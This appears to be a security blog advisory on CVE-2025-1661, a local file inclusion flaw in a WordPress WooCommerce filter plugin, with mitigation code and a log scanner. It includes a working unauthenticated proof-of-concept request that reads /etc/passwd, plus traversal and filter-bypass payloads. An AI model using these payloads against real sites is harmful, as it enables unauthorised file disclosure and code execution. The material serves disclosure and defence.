A security vulnerability has been discovered in the HUSKY - Products Filter Professional for WooCommerce plugin for WordPress. The plugin, designed to enhance the filtering capabilities of a WooCommerce store, is vulnerable to Local File Inclusion (LFI) attacks. This vulnerability affects all versions of the plugin up to, and including, 1.3.6.5.

The LFI vulnerability allows unauthenticated attackers to make the server include, and therefore execute, arbitrary local files. Because the file is pulled in by the PHP interpreter, an attacker can read files the web server can access (configuration files, for example) and can execute PHP code planted in files that would otherwise be harmless, such as uploaded images. This blog post walks through CVE-2025-1661, including a proof-of-concept request and reference links.

Original References

1. HUSKY - Products Filter Professional for WooCommerce plugin - Official Site
2. The issue tracking system - GitHub repository
3. WordPress security advisory - WordPress plugin repository

Exploit Details

The vulnerability exists in the 'woof_text_search' AJAX action of the plugin, reachable through wp-admin/admin-ajax.php without authentication. The handler builds a template path from the user-supplied 'template' parameter and includes it without restricting the value to the plugin's own template directory, so a parameter containing directory-traversal sequences (../) makes the server include an arbitrary local file. Where an attacker can also place a file on the host, for instance an image upload carrying PHP code, including that file executes the embedded PHP.
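To make the failure concrete, the added Python example below (not the plugin's code, which is PHP) models the three path-handling strategies a filter like this could use: the vulnerable concatenate-and-include pattern the advisory describes, a broken "strip ../" blocklist, and an allow-list with a containment check. The template directory and the two template names are assumptions made up for the example.

```python
import posixpath
from typing import Optional

# Constructed layout for this example: the plugin's view templates are assumed
# to live under TEMPLATE_DIR (an assumption, not taken from the plugin), and the
# only templates the handler should ever load are these two hypothetical names.
TEMPLATE_DIR = "/var/www/html/wp-content/plugins/woocommerce-products-filter/views"
ALLOWED_TEMPLATES = {"text_search", "text_search_results"}


def naive_resolve(template: str) -> str:
    """The vulnerable pattern: TEMPLATE_DIR . '/' . $template is handed to
    include. The filesystem collapses every '../' segment, so a value holding
    enough of them walks out of the directory to any file PHP can read."""
    return posixpath.normpath(TEMPLATE_DIR + "/" + template)


def blocklist_resolve(template: str) -> str:
    """A tempting but broken fix: delete the literal '../' sequence.
    str.replace makes a single pass, so '....//' turns into '../' once the
    inner '../' is removed, and the traversal survives intact."""
    cleaned = template.replace("../", "")
    return posixpath.normpath(TEMPLATE_DIR + "/" + cleaned)


def safe_resolve(template: str) -> Optional[str]:
    """Hardened form: accept only a known template name, build the path from
    that name, and still verify the result stays under TEMPLATE_DIR (defence in
    depth in case the allow list is edited later). None means reject."""
    if template not in ALLOWED_TEMPLATES:
        return None
    candidate = posixpath.normpath(TEMPLATE_DIR + "/" + template + ".php")
    if posixpath.commonpath([TEMPLATE_DIR, candidate]) != TEMPLATE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    payload = "../../../../../../../../etc/passwd"
    bypass = "....//" * 8 + "etc/passwd"
    print("naive    :", naive_resolve(payload))
    print("blocklist:", blocklist_resolve(bypass))
    print("safe     :", safe_resolve(payload), "|", safe_resolve("text_search"))
```

The allow-list is what actually closes the hole; the commonpath check is a second line of defence, and it is placed after normalisation so that '..' segments have already been resolved when the comparison runs.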

Code Snippet (Proof of Concept)

import requests

# Unauthenticated request to the WordPress AJAX endpoint; replace example.com
# with the host under test.
url = "http://example.com/wp-admin/admin-ajax.php"
params = {
    "action": "woof_text_search",
    "template": "../../../../../../../../etc/passwd",  # Replace with desired file path
}
response = requests.get(url, params=params, timeout=10)

# admin-ajax.php returns 200 for any handled action, so a 200 alone does not
# prove inclusion: inspect the body for the target file's content.
if response.status_code == 200:
    print(response.text)
else:
    print("Exploit failed.")

This proof of concept demonstrates the LFI by asking the server to include '/etc/passwd', a file that exists on essentially every UNIX-like host and is a common first read test. Since the file contains no PHP tags, the interpreter echoes it back verbatim, so its lines (for example 'root:x:0:0') appear in the response body alongside whatever the AJAX handler normally returns. Eight traversal segments are used so the path reaches the filesystem root regardless of how deep the plugin directory sits; extra segments at the root are harmless.

Mitigation

The issue is remediated by upgrading to a version later than 1.3.6.5, in which the vulnerable handling of the 'template' parameter has been fixed, or by disabling the plugin until the upgrade can be applied. Until then, blocking requests to wp-admin/admin-ajax.php whose 'action' is 'woof_text_search' and whose 'template' contains traversal sequences, an absolute path, or anything other than a bare template name limits exposure, and reviewing web server logs for such requests shows whether the endpoint has already been probed.
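The added Python example below (my own, not part of the original post or the plugin) implements that log review: it parses access-log lines in the common "combined" format, keeps only requests to admin-ajax.php with action=woof_text_search, and flags 'template' values that contain traversal segments, an absolute path, a null byte, or characters a template name should not need. The log lines are constructed for the example, and the rule that a legitimate template name is a bare identifier is an assumption to tune against real traffic.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (Apache/nginx "combined" format); the addresses,
# timestamps and response sizes are made up for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Mar/2025:04:20:01 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=../../../../../../../../etc/passwd HTTP/1.1" 200 2113 "-" "python-requests/2.31.0"
203.0.113.10 - - [11/Mar/2025:04:20:02 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 534 "-" "python-requests/2.31.0"
203.0.113.11 - - [11/Mar/2025:04:20:03 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2113 "-" "curl/8.5.0"
198.51.100.7 - - [11/Mar/2025:04:20:04 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=/var/www/html/wp-content/uploads/2025/03/avatar.png HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.8 - - [11/Mar/2025:04:21:00 +0000] "GET /wp-admin/admin-ajax.php?action=woof_text_search&template=text_search&text=shoes HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Mar/2025:04:21:05 +0000] "GET /shop/?swoof=1&product_cat=boots HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
"""

VULNERABLE_ACTION = "woof_text_search"

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding (%252e -> %2e -> .), one layer per pass,
    so double-encoded traversal is judged on what the server would see."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_template(raw: str) -> Optional[str]:
    """Return the reason a 'template' value looks like an inclusion attempt,
    or None when it is a bare name. Assumption: legitimate template names
    consist only of letters, digits, '_' and '-'."""
    value = decode_fully(raw).replace("\\", "/")
    if ".." in value.split("/"):
        return "traversal"
    if value.startswith("/"):
        return "absolute-path"
    if "\x00" in value:
        return "null-byte"
    if not re.fullmatch(r"[A-Za-z0-9_-]+", value):
        return "unexpected-characters"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Yield one record per suspicious woof_text_search request in the log."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/admin-ajax.php"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
        if qs.get("action", [""])[0] != VULNERABLE_ACTION:
            continue
        for template in qs.get("template", []):
            reason = classify_template(template)
            if reason:
                hits.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                             "template": template, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['reason']:<21} template={hit['template']}")
```

One caveat when reading the results: admin-ajax.php accepts POST as well as GET, and parameters sent in a POST body are not recorded in a standard access log, so this scan only surfaces GET-based probes. For POST coverage the same classify_template check has to run where the request body is visible, for example in a WAF rule or a request-logging plugin.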

Conclusion

The HUSKY - Products Filter Professional for WooCommerce plugin for WordPress, up to and including version 1.3.6.5, is vulnerable to Local File Inclusion through the 'template' parameter of its 'woof_text_search' AJAX action. This vulnerability, tracked as CVE-2025-1661, allows unauthenticated attackers to include and execute arbitrary local files on the server, leading to disclosure of sensitive data or, where an attacker can plant a file containing PHP, code execution. Site owners should upgrade past version 1.3.6.5, or disable the plugin until they can, and check their logs for traversal payloads aimed at this action.

Timeline

Published on: 03/11/2025 04:15:24 UTC
Last modified on: 03/19/2025 20:48:03 UTC